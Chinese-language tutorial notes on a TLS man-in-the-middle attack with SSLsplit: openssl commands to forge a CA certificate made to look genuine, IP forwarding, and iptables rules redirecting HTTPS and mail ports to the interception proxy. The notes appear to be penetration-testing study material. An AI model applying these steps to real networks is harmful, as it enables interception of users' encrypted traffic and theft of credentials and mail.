SSL/TLS中间人攻击
SSLsplit
·透明SSL/TLS中间人攻击工具
·伪装成服务器与客户端
·伪装服务器需要伪造证书
·支持SSL/TLS加密的SMTP POP3 FTP等通信中间人攻击
利用openssl生成证书私钥
·openssl genrsa -out ca.key 2048（主流的密钥长度）
利用私钥签名生成证书
·openssl req（请求） -new（新的证书） -x509（证书格式） -days 1096（有效期） -key ca.key（生成需要的私钥） -out ca.crt   （填写基本信息  尽量贴近真实）

生成根证书后 一会会伪造相应的证书

中间人需要路由功能（操作系统的）
·启动路由
 sysctl -w net.ipv4.ip_forward=1（echo 1 > /proc/sys/net/ipv4/ip_forward）

iptables端口转发规则（发到443端口的流量 转发到sslsplit侦听的端口）（80 443端口不能被占用）
·iptables -L 来查看会泽设置
·iptables -t nat -L 查看net的规则  如果有加个-F情况掉
iptables -t nat -F
·首先 netstat -pantu | grep :444/80 然后结束掉响应
· iptables -t nat -F 
· iptables -t（使用nat表） nat -A PREROUTING（路由之前就生效的规则） -p tcp --dport 80（发给80的流量） -j REDIRECT（重定向） --to-ports 8080 （到8080端口）
· iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443（与80   8080的一样）
· iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
除了转发TCP  其它的也可以
· iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
· iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS 
· iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S 
· Iptables -t nat -L